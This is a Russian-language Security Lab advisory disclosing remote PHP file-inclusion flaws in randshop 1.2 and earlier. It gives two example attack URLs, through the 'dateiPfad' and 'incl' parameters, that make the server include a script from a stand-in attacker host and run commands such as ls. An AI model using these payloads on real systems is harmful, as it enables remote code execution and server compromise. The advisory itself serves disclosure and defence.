Security Lab

PHP-инклюдинг в randshop

Дата публикации:06.07.2006
Дата изменения:06.04.2009
Всего просмотров:2624
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-3537
CVE-2006-3375
CVE-2006-3374
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: randshop 1.x
Уязвимые версии: randshop 1.2 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”dateiPfad” в сценарии includes/header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[path]/includes/header.inc.php? dateiPfad=http://[attacker]/cmd.txt?&cmd=ls

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”incl” в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/randshop/index.php?incl=http://evilscript?

URL производителя: www.randshop.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: randshop <= 1.1.1 Remote File Inclusion Vulnerability
file include exploits in randshop v1.2